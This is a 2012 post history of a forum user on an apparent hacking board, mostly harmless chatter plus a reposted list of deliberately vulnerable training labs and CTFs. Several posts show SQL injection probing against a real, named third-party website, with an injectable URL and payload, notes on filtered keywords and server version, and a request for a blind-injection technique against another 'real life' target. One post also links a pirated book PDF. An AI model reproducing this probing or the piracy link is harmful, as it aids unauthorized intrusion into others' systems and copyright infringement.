Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - peak

Pages: [1] 2
1
Found it on the Webs / Re: [Free] E-Learning Platforms
« on: December 14, 2012, 08:33:28 pm »
I knew a few but +1 for the list.

I wanna contribute to the list:

wibit.net

Quote
WiBit.net is a video tutorial web site offering cutting edge programming and computer tutorials. We specialize in focused and linear content. WiBit is a great place to start learning how to program, or to pick up new skills even if you've been at it a while.

Our approach to learning is simple: complete, comprehensive, linear classes. What this means is that we do not revisit concepts. We'll teach you the basics (ex: object oriented concepts) in our C++ tutorial and we will not revisit those concepts again. From C++ on it will be assumed the viewer understands the basic concepts covered in the previous course, so there is no repeated lessons. This type of learning holds two advantages:

Focused learning for the newbie
Courses that go straight to the point for experienced programmers
Here at WiBit we are all programmers. We built this site and these tutorials around what we would want in this site. We aim to create a learning environment that is easy to understand, easy to use, and comfortable.

WiBit started out as a school project many years ago and has recently been rejuvenated with new content, and a new web site. The old content still receives a lot of attention thanks to bit torrent, and it is because of that attention that we're relaunching the site. We receive emails daily from around the globe from people thanking us for the videos, and asking us to make more.

2
Hacking and Security / Re: Site injectable?
« on: December 10, 2012, 08:48:16 pm »
Quote
How did you find out which keywords are getting filtered out? Just trying or software?

Comment out the rest of the string and type your keywords into the comment part.

... 1,2,3,4,5 -- xx  from

By the way: Just by clicking around I already found an orderby injection:

http://www.tantrix.com/cgi-bin/gs_rankings2.cgi?order-by=ranking2'&country=Spain

3
Hacking and Security / Re: Site injectable?
« on: December 10, 2012, 07:54:40 pm »
Well I took a deeper look at the vulnerability.

It is indeed injectable. But there is a simple WAF aka filtering going on. Its just the select keyword "from" that gets filtered and /etc/passwd as I noticed but nothing else so far.

Conclusion: You cannot bypass the keyword "from" and you don't have file privileges. You can extract the information about the player table with the given Select statement but beside that there is no exploitation by sqli possible on this parameter.

Apache is 1.3.41 though ...

cheers

4
Hacking and Security / Re: Site injectable?
« on: December 10, 2012, 07:18:44 pm »
Without trying myself I can already say:
Quote
....  that corresponds to your MySQL server version for ...
...got it?

5
Hacking and Security / SQL Injection Question
« on: October 26, 2012, 08:19:47 pm »
Hello EZ Members

The Task is very simple tough the answer is not.

There are 3 Rules in this real life sqlinjection.

1. MySQL Server without Subqueries (Subqueries are not supported <4.1)
2. Union Injection without Output.
3. Error Messages contain no extra information (no error based injection possible)
4. No Sleep and benchmark does not make a significant change in response time (no time based injection possible)

But I do know the tables and columns!

What I think could be the solution:

I can work out a different kind of blind injection using the union and and if statement in the where part.
The Problem is:
I need something like (select 1 union select 2) that will be a valid part of a sql Query but without a subquery used to let it fail and give me a feedback is the equation I use for blind injection is true or false.

I failed to find something like that yet.

Maybe some l33t old mysql Admin has an Idea?

sincerely

peak

6
Found it on the Webs / Re: Amazing electric guitar playing
« on: September 25, 2012, 11:44:32 pm »
I can actually play this, its not that hard. there is just one short tricky part. the rest is quite simple. The tricky part btw is at 01:42. And I just noticed he missed a note at 03:54 ... just noticed  8)

here more harder version of the same song: https://www.youtube.com/watch?v=0vgphabkqDk&feature=related
 

7
General discussion / Re: What books are people reading?
« on: September 23, 2012, 01:42:40 pm »
Do you have the pdf?

Yes I do since ~6h after the release :-)

This book really gives a look in to the live of a seal. It's not alot about tactics but he talks a lot about becoming devgru and how the people are on that level. specially that they all are human beeings. Also about lessons learned and stuff. And ofc a big part is about the osama raid. A very good read if you are into special operations and stuff. You notice that it is probably the truth. Specially if you compare it to "bravo two zero" thats just a big fiction story about truth happenings.

here is the link:

http://netload.in/dateijOrj3zoEC5.htm

8
Hacking and Security / Re: Test your skills as a Hack3r
« on: September 22, 2012, 03:32:14 pm »
You got a whole list with a lot of different systems here:

source:
http://g0tmi1k.blogspot.ch/2011/03/vulnerable-by-design.html


 Vulnerable by Design    Pentest lab. "Hacker" training. Deliberately insecure applications challenge thingys. Call it what you will, but what happens when you want to try out your new set of skills? Do you want to be compare results from a tool when it's used in different environments? What if you want to explore a system (that is legal to do so!) that you have no knowledge about (because you didn't set it up!)...
 If any of that sounds helpful, below is a small collection of different environments, so if you want to go from "boot to root", "capture the flag" or just to dig around as much as you want to try out the odd thing here and there. These will allow you to do so and without getting in trouble for doing it!
 
 
The idea isn't to cheat, the aim is to learn a thing or two ;)

 
I'm sure there are a lot more out there, if you want to recommend any others - please so do! =)

 'Complete' Operating System. The idea of going from boot to root via any which way you can. Most of them have multiple entry points (some are easier than others) so you can keep using it ;)  They are all Linux OS (either in ISO or VM form) with vulnerable/configured software installed. (If you haven't got any VM software, VMware Player is free and will do the trick)
 
 (Offline) Web based. Most of them you'll need to download, copy and load the files yourself on your own web server (if you haven't already got one, xampp is great). A few of them are VM images that can be loaded in to Virtual machines as they come with all the software & settings needed.
 (Online) Web based. Same as above, however if you don't want the hassle of setting it all up or to be able to do it where ever you have a Internet connection...
 
 War Games (VPN).  These are computer break-in challenge, were you try and compete against other users. They are usually 'ranked' in which you collect points, over multiple levels to make your way onto a 'Hall Of Fame' (Top 10,25,50 or 100 Users). This all takes part on a separate private network, where you have to connect into it each time.
 War Games (Web Based). Same as above, however if you don't want the hassle of connecting every time you can compete using a web browse.
 
 Forensic.  The idea is to analysis event(s) to see if you can understand what either has been going or or happening currently. Some are complete disk images with scenarios, whereas some are 'single' exercises (e.g. 'Data Carving', 'Memory Dump Analysis' or 'Reserve Engineering').
 
 Mobile Platforms. The same idea the subjects above, however these programs are designed for mobile use on smart phones. The increase of mobile phone usage is on the rise, along with smart phones. As more and more programs are being created for this platform, this makes the possibly of more 'poorly' coded programs and/or higher change of malware. These programs are meant to defend against these program 'defects'.
 
 Capture The Flag Competitions.  At various events, competitions are run to attack and defend computers and networks. Here is a list of resources which were used.
 
 Other collections & listsOther lists of different types of 'vulnerable' software
 Other useful pages on the 'subject'. 'Helpful' information to look at. Worth a read!
 
 
 
 
  Complete Operating System Name: Damn Vulnerable Linux Homepage: http://www.damnvulnerablelinux.org/
 Brief description: Damn Vulnerable Linux (DVL) is everything a good Linux distribution  isn’t. Its developers have spent hours stuffing it with broken,  ill-configured, outdated, and exploitable software that makes it  vulnerable to attacks. DVL isn’t built to run on your desktop – it’s a  learning tool for security students.
 Version/Levels: 1
 Support/Walk-through: Brochure
 
 
  Name: De-ICE Homepage: http://heorot.net/livecds/ or http://www.de-ice.net
 Brief description: The PenTest LiveCDs are the creation of Thomas Wilhelm, who was  transferred to a penetration test team at the company he worked for.   Needing to learn as much about penetration testing as quickly as  possible, Thomas began looking for both tools and targets.  He found a  number of tools, but no usable targets to practice against.  Eventually,  in an attempt to narrow the learning gap, Thomas created PenTest  scenarios using LiveCDs.
 Version/Levels: Level 1 - Disk 1, Level 1 - Disk 2, Level 1 - Disk 3 (A & B) Level 2 - Disk 1
 Support/Walk-through: Forums, WikiLevel 1 - Disk 1, Level 1 - Disk 2, Level 1 - Disk 3, Level 2 - Disk 1
 
 
  Name: Hackademic Homepage: http://ghostinthelab.wordpress.com/
 Brief description: Download the target and get root.After all, try to read the contents of the file “key.txt” in the root directory.
 Version/Levels: 2 (Box 1, Box 2)
 Support/Walk-through: N/A
 
 
  Name: Holynix Homepage: http://pynstrom.net/holynix.php
 Brief description: Holynix is a Linux distribution that was deliberately built to have security holes for the purposes of penetration testing.
 Version/Levels: 2
 Support/Walk-through: Forum, SourceForge
 
 
  Name: Kioptrix Homepage: http://www.kioptrix.com
 Brief description: This Kioptrix VM Image are easy challenges. The object of the game is to acquire
 root access via any means possible (except actually hacking the VM server or player).
 The purpose of these games are to learn the basic tools and techniques in vulnerability
 assessment and exploitation. There are more ways then one to successfully complete the challenges.

 Version/Levels: 3
 Support/Walk-through: Blog, Level 1 - mod_ssl, Level 2 - Injection, Level 3
 
 
  Name: Metasploitable Homepage: http://blog.metasploit.com/2010/05/introducing-metasploitable.html
 Brief description: One  of the questions that we often hear is "What systems can i use to  test  against?" Based on this, we thought it would be a good idea throw   together an exploitable VM that you can use for testing purposes.
 Version/Levels: 1
 Support/Walk-through: Blog, DistCC, MySQL, PostgreSQL, TikiWiki, TomCat
 
 
  Name: NcN 2011 Homepage: http://noconname.org
 Brief description: This machine has several users, one for each level, so that exploiting the various challenges pose the participant will be changing and increasing user privileges.
 Version/Levels: 6 levels
 Support/Walk-through: Download (Mirror), Rules
 
 
  Name: NETinVM Homepage: http://informatica.uv.es/~carlos/docencia/netinvm/#id7
 Brief description: NETinVM is a single VMware virtual machine image that contains, ready to run, a series of User-mode Linux (UML) virtual machines which, when started, conform a whole computer network inside the VMware virtual machine. Hence the name NETinVM, an acronym for NETwork in Virtual Machine. NETinVM has been conceived mainly as an educational tool for teaching and learning about operating systems, computer networks and system and network security, but other uses are certainly possible.
 Version/Levels: 3 (2010-12-01)
 Support/Walk-through: Blog
 
 
  Name: pWnOS Homepage: http://forums.heorot.net/viewtopic.php?f=21&t=149
 Brief description: It's a linux virtual machine intentionally configured with exploitable  services to provide you with a path to r00t. :) Currently, the virtual  machine NIC is configured in bridged networking, so it will obtain a  normal IP address on the network you are connected to. You can easily  change this to NAT or Host Only if you desire. A quick ping sweep will  show the IP address of the virtual machine.
 Version/Levels: 1
 Support/Walk-through: Forums, Level 1
 
 
  Name: RuCTFE 2010 Homepage: http://ructf.org/e/2010/
 Brief description: RuCTFE is a remote challenge in information security
 Version/Levels: 1
 Support/Walk-through: Network Setup
 
 
  (File)Name: vulnimage.zip Homepage: http://ds.mathematik.uni-marburg.de/
 Brief description: Nameless & No description!!!!
 Version/Levels: 1
 Support/Walk-through: N/A
 
 
 
  (Offline) Web Based Name: BadStore Homepage: http://www.badstore.net/
 Brief description: Badstore.net is dedicated to helping you understand how hackers prey on  Web application vulnerabilities, and to showing you how to reduce your  exposure. Our Badstore demonstration software is designed to show you  common hacking techniques.
 Version/Levels: 1 (v1.2)
 Support/Walk-through: PDF
 
 
  Name: BodgeIT Homepage: https://code.google.com/p/bodgeit/
 Brief description: The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to pen testing.
 Version/Levels: 1 (v1.3.0)
 
 
  Name: Damn Vulnerable Web App Homepage: http://www.dvwa.co.uk/
 Brief description: Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is  damn vulnerable. Its main goals are to be an aid for security  professionals to test their skills and tools in a legal environment,  help web developers better understand the processes of securing web  applications and aid teachers/students to teach/learn web application  security in a class room environment.     
 Version/Levels: 1 (v1.0.7)
 Support/Walk-through: PDF
 
 
  Name: HackUS HackFest Web CTF Homepage: http://hackus.org/en/media/training/& http://www.h3xstream.com/codeView.jspx?key=4001
 Brief description: The  Hackfest is an annual event held in Quebec city. For each event, a   competition is held where participants competed at solving challenges   related to security. For the 2010 edition, I got involved in the   competition by creating the web portion of the competition.
 Version/Levels: 1 (2010)
 Support/Walk-through: Blog, Solutionnaire (English)
 
 
  Name: Hacme Homepage: http://www.mcafee.com/us/downloads/free-tools/index.aspx
 Brief description: Foundstone  Hacme Casino™ is a learning platform for secure software  development  and is targeted at software developers, application  penetration  testers, software architects, and anyone with an interest in   application security.
 Version/Levels: 5 (2006)
 Support/Walk-through: Bank, Book, Casino, Shipping, Travel
 
 
  Name: Hackxor Homepage: http://hackxor.sourceforge.net/cgi-bin/index.pl
 Brief description: Hackxor    is a webapp hacking game where players must locate and exploit     vulnerabilities to progress through the story. Think WebGoat but with a     plot and a focus on realism&difficulty. Contains XSS, CSRF,    SQLi,  ReDoS, DOR, command injection, etc
 Version/Levels: 1
 Support/Walk-through: Online Version, Cryptic spoiler-free hints
 
 
  Name: LAMPSecurity Homepage: http://sourceforge.net/projects/lampsecurity/
 Brief description: Foundstone  Hacme Casino™ is a learning platform for secure software  development  and is targeted at software developers, application  penetration  testers, software architects, and anyone with an interest in   application security.
 Version/Levels: v6 (4x)
 Support/Walk-through: SourceForge
 
 
  Name: Moth Homepage: http://www.bonsai-sec.com/en/research/moth.php
 Brief description: Moth is a VMware image with a set of vulnerable Web  Applications and scripts.
 Version/Levels: v6 
 Support/Walk-through: SourceForge
 
 
  Name: Mutillidae Homepage: http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
 Brief description: Mutillidae: A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10
 Version/Levels: v1.5
 Support/Walk-through: N/A
 
 
  Name: OWASP Broken Web Applications Project Homepage: https://code.google.com/p/owaspbwa/ or https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
 Brief description: This project includes applications from various sources (listed in no particular order).
 Intentionally Vulnerable Applications:
  Old Versions of Real Applications:
 
  • WordPress 2.0.0 (PHP, released December 31, 2005, downloaded from www.oldapps.com)
  • phpBB 2.0.0 (PHP, released April 4, 2002, downloaded from www.oldapps.com
  • Yazd version 1.0 (Java, released February 20, 2002)
  • gtd-php version 0.7 (PHP, released September 30, 2006)
  • OrangeHRM version 2.4.2 (PHP, released May 7, 2009)
  • GetBoo version 1.04 (PHP, released April 7, 2008)
Version/Levels: v0.92rc1
 Support/Walk-through: N/A
 
 
  Name: OWASP Hackademic Challenges Project Homepage: https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project
 Brief description: The OWASP Hackademic Challenges Project is an open source project that helps you test your knowledge on web application security. You can use it to actually attack web applications in a realistic but also controlable and safe environment.
 Version/Levels: 1 (Live Version)
 Support/Walk-through: GoogleCode (Download Offline Version)
 
 
  Name: OWASP Insecure Web App Project Homepage: https://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project
 Brief description: InsecureWebApp is a web application that includes common web application vulnerabilities. It is a target for automated and manual penetration testing, source code analysis, vulnerability assessments and threat modeling.
 Version/Levels: 1
 Support/Walk-through: N/A
 
 
  Name: OWASP Vicnum Homepage: http://vicnum.ciphertechs.com/
 Brief description: A mirror of deliberately insecure applications and old softwares  with known vulnerabilities. Used for proof-of-concept /security training/learning purposes. Available in either virtual images or live iso or standalone formats
 Version/Levels: 1.4 (2009)
 Support/Walk-through: SourceForge (Download Offline Version)
 
 
  Name: OWASP WebGoat Homepage: http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
 Brief description: WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application.
 Version/Levels: 1
 Support/Walk-through: User Guide, GoogleCode, SourceForge
 
 
  Name: PuzzleMall Homepage: https://code.google.com/p/puzzlemall/
 Brief description: PuzzleMall is a vulnerable web application designed for training purposes.It is prone to a variety of different session puzzle exposures, which can be detected and exploited using different session puzzling sequences.
 Version/Levels: 1
 Support/Walk-through: N/A
 
 
  Name: SecuriBench Homepage: http://suif.stanford.edu/~livshits/securibench/
 Brief description: Stanford SecuriBench is a set of open source real-life programs to be used as a testing ground for    static and dynamic security tools. Release .91a focuses on Web-based applications written in Java   
 Version/Levels: Normal, Micro
 Support/Walk-through: N/A
 
 
  Name: The ButterFly Homepage: http://sourceforge.net/projects/thebutterflytmp/
 Brief description: The ButterFly project is an educational environment intended to give aninsight into common web application and PHP vulnerabilities. The environment alsoincludes examples demonstrating how such vulnerabilities are mitigated.
 Version/Levels: 1
 Support/Walk-through: N/A
 
 
  Name: UltimateLAMP Homepage: http://ronaldbradford.com/blog/ultimatelamp-2006-05-19/
 Brief description: UltimateLAMP is a fully functional environment allowing  you to easily try and evaluate a number of LAMP stack software products  without requiring any specific setup or configuration of these  products. UltimateLAMP runs as a Virtual Machine with  VMware Player (FREE).  This demonstration package also enables the  recording of all user entered information for later reference, indeed  you will find a wealth of information already available within a number  of the Product Recommendations starting with the supplied Documentation.
 Version/Levels: v0.2
 Support/Walk-through: Passwords
 
 
  Name: Virtual Hacking Lab Homepage: http://virtualhacking.sourceforge.net/
 Brief description: A mirror of deliberately insecure applications and old softwares  with known vulnerabilities. Used for proof-of-concept /security  training/learning purposes. Available in either virtual images or live  iso or standalone formats
 Version/Levels: 1
 Support/Walk-through: SourceForge
 
 
  Name: WackoPicko Homepage: https://github.com/adamdoupe/WackoPicko
 Brief description: WackoPicko is a vulnerable web application used to test web application vulnerability scanners.
 Version/Levels: 1
 Support/Walk-through: N/A
 
 
  Name: WAVSEP - Web Application Vulnerability Scanner Evaluation Project Homepage: https://code.google.com/p/wavsep/
 Brief description: A vulnerable web application designed to help assessing the features, quality and accuracy of web application vulnerability scanners.This evaluation platform contains a collection of unique vulnerable web pages that can be used to test the various properties of web application scanners.
 Version/Levels: 1
 Support/Walk-through: N/A
 
 
 
 
 
  Name: WebMaven/Buggy Bank Homepage: http://www.mavensecurity.com/WebMaven/
 Brief description: WebMaven (better known as Buggy Bank) was an interactive learning  environment for web application security. It emulated various security  flaws for the user to find. This enabled users to safely & legally  practice web application vulnerability assessment techniques. In  addition, users could benchmark their security audit tools to ensure  they perform as advertised.           
   Version/Levels: v1.0.1
 Support/Walk-through: Download
 
 
 
  Name: Web Security Dojo Homepage: http://www.mavensecurity.com/web_security_dojo/
 Brief description: A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo
 Various web application security testing tools and vulnerable web applications were added to a clean install of Ubuntu v10.04.1, which is patched with the appropriate updates and VM additions for easy use.
 Version 1.1 includes an exclusive speed-enhanced version of Burp Suite Free.  Special thanks to PortSwigger .
 Version/Levels: 1
 Support/Walk-through: SourceForge
 
 
 
  (Online) Web Based Name: Biscuit Homepage: http://heideri.ch/biscuit/
 Brief description: Goal: alert(document.cookie) // extract the PHPSESSID, FF3.6 - 4 only!
 Version/Levels: 1
 Support/Walk-through: N/A
 
 
  Name: Gruyere / Jarlsberg Homepage: http://google-gruyere.appspot.com/
 Brief description: This   codelab shows how web application vulnerabilities can be exploited and   how to defend against these attacks. The best way to learn things is  by  doing, so you'll get a chance to do some real penetration testing,   actually exploiting a real application
 Version/Levels: 1 (v1.0.7)
 Support/Walk-through: PDF Download offline
 
 
 
  Name: HackThis Homepage: http://www.hackthis.co.uk/
 Brief description: Welcome to HackThis!!, this site was set up over 2 years ago as a safe  place for internet users to learn the art of hacking in a controlled  environment, teaching the most common flaws in internet security.
 Version/Levels: 32 (40?)
 Support/Walk-through: N/A
 
 
  Name: hACME Homepage: http://www.hacmegame.org/hacmegame/main/welcome.html
 Brief description: hACME game is software security learning game, mainly concerning web applications. The game is intended to help raise awareness and interest in the subject of software security as well as train developers. The purpose of the game is not to train hackers, but to make future software developers aware of how important security is.
 Version/Levels: Lots
 Support/Walk-through: N/A
 
 
  Name: Hackxor Homepage: http://hackxor.sourceforge.net/cgi-bin/index.pl
 Brief description: Hackxor    is a webapp hacking game where players must locate and exploit     vulnerabilities to progress through the story. Think WebGoat but with a     plot and a focus on realism&difficulty. Contains XSS, CSRF,    SQLi,  ReDoS, DOR, command injection, etc
 Version/Levels: 1
 Support/Walk-through: Online Version, cryptic spoiler-free hints
 
 
  Name: OWASP Hackademic Challenges Project Homepage: https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project
 Brief description: The OWASP Hackademic Challenges Project is an open source project that helps you test your knowledge on web application security. You can use it to actually attack web applications in a realistic but also controlable and safe environment.
 Version/Levels: 1 (Live Version)
 Support/Walk-through: GoogleCode (Download Offline Version)
 
 
  Name: OWASP Vicnum Homepage: http://vicnum.ciphertechs.com/
 Brief description: A mirror of deliberately insecure applications and old softwares  with known vulnerabilities. Used for proof-of-concept /security  training/learning purposes. Available in either virtual images or live  iso or standalone formats
 Version/Levels: 1.4 (2009)
 Support/Walk-through: SourceForge (Download Offline Version)
 
 
  Name: PCTechTips - pwn3d the login form. Homepage: http://pctechtips.org/hacker-challenge-pwn3d-the-login-form/
 Brief descriptionI came up with this pwn3d zit3 login form challenge, to kind of expose one of the many web application vulnerabilities; it consists of a login form which authenticates against a mysql backend database to give authorized access to the members only part of the web site (you must become a member first—>”REGISTER”)
 Version/Levels: 1
 Support/Walk-through: N/A
 
 
 Name: XSSMe
Homepage: http://xssme.html5sec.org/
 Brief description: Find a way to steal document.cookie w/o user interaction
 Version/Levels: 1
 Support/Walk-through: N/A
 
 
 Name: XSS Me!
Homepage: http://html5sec.org/xssme.php
 Brief description: XSS ME! (vulnerable param: GET['xss'])
 Version/Levels: 1
 Support/Walk-through: N/A
 
 
  Name: Can You XSS This? Homepage: http://canyouxssthis.com/HTMLSanitizer/
 Brief description: XSS ME! (vulnerable param: GET['xss'])
 Version/Levels: 1
 Support/Walk-through: N/A
 
 
  Name: Test x5s Homepage: http://www.nottrusted.com/x5s/
 Brief description: This will give you a small working example of how to use x5s to find encoding and transformation issues that can lead to XSS vulnerability.
 Version/Levels: 1
 Support/Walk-through: N/A
 
 
  Name: XSS Progphp Homepage: http://xss.progphp.com/
 Brief description: This site has a number of XSS problems.  See if you can find them all.
 Version/Levels: 1
 Support/Walk-through: N/A
 
 
  Name: XSS Quiz Homepage: http://xss-quiz.int21h.jp
 Brief description: XSS it.
 Version/Levels: Lots
 Support/Walk-through: N/A
 
 
 
  WarGames (VPN) Name: Hacking-Lab Homepage: http://www.hacking-lab.com/
 Brief description: This ist the LiveCD project of Hacking-Lab (www.hacking-lab.com). It gives you OpenVPN access into Hacking-Labs Remote Security Lab. The LiveCD iso image runs very good natively on a host OS, or within a virtual environment (VMware, VirtualBox).
 The LiveCD gives you OpenVPN access into Hacking-Lab Remote.You will gain VPN access if both of the two pre-requirements are fulfilled.
 Version/Levels: 1 (v5.30)
 Support/Walk-through: Download
 
 
  Name: OverTheWire Homepage: http://www.overthewire.org/wargames/
 Brief description: The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of funfilled games.
 Levels: 7
 Support/Walk-through: N/A
 
 
  Name: pwn0 Homepage: https://pwn0.com/home.php
 Brief description: Just sign up, connect to the VPN, and start hacking.
 Levels:1
 Support/Walk-through: N/A
 
 
 
  WarGames (Web Based) Name: HackThisSite Homepage: http://www.hackthissite.org/
 Brief description: Hack This Site is a free, safe and legal training ground for hackers to test and expand their hacking skills. More than just another hacker wargames site, we  are a living, breathing community with many active projects in  development, with a vast selection of hacking articles and a huge forum  where users can discuss hacking, network security, and just about  everything. Tune in to the hacker underground and get involved with the  project.
 Version/Levels: Lots
 Support/Walk-through: N/A
 
 
  Name: Enigma Group - Training Missions Homepage: http://www.enigmagroup.org/pages/basics/
 Brief description: Have you ever wanted to learn how to hack? Are you more of a hands on learner, then one that can learn from just reading out of a book? Are you interested in developing secure code by understanding how a hacker will attack your application? If you answered "yes" to any of these questions, then this site is for you.
 Version/Levels: Lots
 Support/Walk-through: N/A
 
 
  Name: HellBoundHackers Homepage: http://www.hellboundhackers.org/
 Brief description: The hands-on approach to computer security.Learn how hackers break in, and how to keep them out.
 Levels: Lots
 Support/Walk-through: N/A
 
 
  Name: SmashTheStack Homepage: http://www.smashthestack.org
 Brief description: The Smash the Stack Wargaming Network hosts several Wargames. A Wargame in our context can be described as an ethical hacking environment that supports the simulation of real world software vulnerability theories or concepts and allows for the legal execution of exploitation techniques. Software can be an Operating System, network protocol, or any userland application.
 Levels: Lots
 Support/Walk-through: N/A
 
 
  Name: Wechall Homepage: https://www.wechall.net
 Brief description: For the people not familiar with challenge sites, a challenge site is mainly a site focussed on offering computer-related problems. Users can register at such a site and start solving challenges. There exist lots of different challenge types. The most common ones are the following: Cryptographic, Crackit, Steganography, Programming, Logic and Math/Science. The difficulty of these challenges vary as well.
 Version/Levels: Lots
 Support/Walk-through: N/A
 
 
 Name: VulnerabilityAssessment
Homepage: http://www.vulnerabilityassessment.co.uk
 Brief description: Hopefully a valuable information source for Vulnerability Analysts and Penetration Testers alike.
 Version/Levels: Lots
 Support/Walk-through: N/A
 
 
 Name: Net-Force
Homepage: http://net-force.nl
 Brief description: N/A
 Version/Levels: Lots
 Support/Walk-through: N/A
 
 
  Name: Hack Quest Homepage: http://hackquest.com
 Brief description: This site offers a unique hack challenge especially for beginners and intermediates.
 Version/Levels: Lots
 Support/Walk-through: N/A
 
 
 
  Forensic Name: Binary-Auditing Homepage: http://www.binary-auditing.com/
 Brief description: Learn the fundamentals of Binary Auditing. Know how HLL mapping works, get more inner file understanding than ever.
 Try to solve brain teasing puzzles with our collection of copy protection games. Increasing difficulty and unseen strange tricks.
 Learn how to find and analyse software vulnerability. Dig inside Buffer Overflows and learn how exploits can be prevented.
 Start to analyse your first viruses and malware the safe way. Learn about simple tricks and how viruses look like using real life examples.

 Version/Levels: Lots
 Support/Walk-through: N/A
 
 
  Name: Digital Forensics Tool Testing Images Homepage: http://dftt.sourceforge.net/
 Brief description: To fill the gap between extensive tests from NIST and no public tests, I have been developing small test cases. The following are file system and disk images for testing digital (computer) forensic analysis and acquisition tools.
 Version/Levels: 14
 Support/Walk-through: N/A
 
 
  Name: Digital Corpora - DiskImages & Scenarios Homepage: http://digitalcorpora.org/corpora/disk-images & http://digitalcorpora.org/corpora/scenarios
 Brief description: We have many sources of disk images available for use in education   and  research. The easiest disk images to work with are the NPS Test   Disk  Images.   
 Scenarios are collections of multiple disk images, memory dumps,  network traffic, and/or data from portable devices.
 Version/Levels: 3 + 7
 Support/Walk-through: N/A
 
 
  Name: DFRWS 2011 Forensics Challenge Homepage: http://www.dfrws.org/2011/challenge/
 Brief description: Given the variety and impending ubiquity of Android devices along with  the wide range of crimes that can involve these systems as a source of  evidence, the DFRWS has created two scenarios for the forensics  challenge in 2011.
 Version/Levels: 2
 Support/Walk-through: N/A
 
 
  Name: ForensicKB Homepage: http://www.forensickb.com/search/label/Forensic%20Practical
 Brief description: We have many sources of disk images available for use in education and  research. The easiest disk images to work with are the NPS Test Disk  Images.
 Version/Levels: Level 1, Level 2, Level 3, Level 4
 Support/Walk-through: Level 1 - Solution
 
 
  Name: Honeynet Project Challenges Homepage: https://www.honeynet.org/challenges
 Brief description: The purpose of Honeynet Challenges is to take this learning one step  farther. Instead of having the Honeynet Project analyze attacks and  share their findings, Challenges give the security community the  opportunity to analyze these attacks and share their findings. The end  results is not only do individuals and organizations learn about  threats, but how to learn and analyze them. Even better, individuals can  see the write-ups from other individuals, learning new tools and  technique for analyzing attacks. Best of all, these attacks are from the  wild, real hacks.
 Version/Levels: 8
 Support/Walk-through: N/A
 
 
  Name: SecuraLabs Challenge Homepage: http://www.securabit.com/
 Brief description: Part 1 - What is the name of exploit kit being used in this pcap (not the verison, you may include the entire string on that line)?
 Part 2 - the decryption key will be the main name of the exploit kit all in lower case without spaces, and without the version or anything else on that line in the file.
 Part 3 - Submit a working key and serial.

 Version/Levels: Two (One, Two)
 Support/Walk-through: N/A
 
 
 
  Mobile Platforms Name: ExploitMe Homepage: http://labs.securitycompass.com/tools/new-mobile-security-course-and-exploitme-mobile/
 Brief description: If your organization is working with mobile applications this course is a fantastic primer on how mobile apps can be hacked, and how your teams can defend against these software defects.
 Version/Levels: One
 Support/Walk-through: Android, iPhone
 
  Capture The Flag Competitions Name: CSAW (Cyber Security Awareness Week) CTF Homepage: http://www.poly.edu/csaw2011
 Brief description: N/A
 Version/Levels: 2011
 Support/Walk-through: N/A
 
 
  Name: CodeGate 2011 Homepage: http://www.codegate.org/Eng/
 Brief description: N/A
 Version/Levels: 2011
 Support/Walk-through: Write up
 
 
  Name: Defcon 19 Homepage: https://www.defcon.org
 Brief description: N/A
 Version/Levels: 2011
 Support/Walk-through: N/A
 
 
  Name: Hacklu Homepage: http://2011.hack.lu/index.php/Main_Page
 Brief description: N/A
 Version/Levels: 2011
 Support/Walk-through: Write Up
 
 
  Name: ISEC CTF WarFare Homepage: http://isec2011.wowhacker.com
 Brief description: N/A
 Version/Levels: 2011
 Support/Walk-through: N/A
 
 
  Name: Plaid CTF Homepage: http://www.plaidctf.com
 Brief description: N/A
 Version/Levels: 2011
 Support/Walk-through: Write Ups
 
 
 
  Name: RSSIL Homepage: http://www.rssil.org
 Brief description: N/A
 Version/Levels: 2011
 Support/Walk-through: Write Up
 
  Name: Insomni'hack 2k11 Homepage: https://blog.fortinet.com/insomnihack-2011/
 Brief description: N/A
 Version/Levels: 2011
 Support/Walk-through: N/A
 
 
 
  Other collections & lists Practice Labs at Hacking Cisco - http://packetlife.net/blog/2011/apr/15/practice-labs-hacking-cisco/
 
 Vulnerable Web Applications for learning - https://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/
 
 Pentesting Vulnerable Study Frameworks Complete List - http://www.felipemartins.info/2011/05/pentesting-vulnerable-study-frameworks-complete-list/
 
 RSnake's Vulnerability Lab - http://ha.ckers.org/weird/
 
 Pentest lab vulnerable servers-applications list - http://bailey.st/blog/2010/09/14/pentest-lab-vulnerable-servers-applications-list/
 
 
 
 
  Other useful pages on the 'subject' Blindly Installing VMs and Using Live CDs - http://www.digininja.org/blog/untrusted_vms.php
 
 How to set up a penetration testing lab - http://www.metasploit.com/learn-more/how-do-i-use-it/test-lab.jsp
 
 Run your LiveCD directly on Windows - http://mobalivecd.mobatek.net/en/
 
  Capture The Flag Daemon - http://sourceforge.net/projects/ctfd/

9
General discussion / Re: What books are people reading?
« on: September 18, 2012, 04:31:27 pm »
No Easy Day (About the Osama Mission and the Navy Seals)

10
Hacking and Security / Re: Best vpn
« on: September 18, 2012, 04:25:04 pm »
I can recommend you ovpn.to

It is run by mr.nice. He is known in some circles and on youtube you find also a clip about their logs.

greetz

peak

11
Hacking and Security / Re: how to find webVulns by Script?
« on: September 03, 2012, 08:31:47 am »
ah I see ...  I can do it by hand! Not a problem and I know different kinds of blind ty NeX.
But my Crawler makes so much output that I cant do them all by hand. I'll just do the ones I know that they are vuln.

And @ragehottie to be correct, you mixed it up bbtw. its either ' and '1'='1 or just and 1=1  .... ofc you run into problem if it is not a normal "where" injection without any brackets.

Well I guess you dont really can't. Thanks for your input anyay. I'll just drop them. Since I will have enough results...

12
Hacking and Security / Re: how to find webVulns by Script?
« on: September 02, 2012, 12:55:47 pm »
*push*

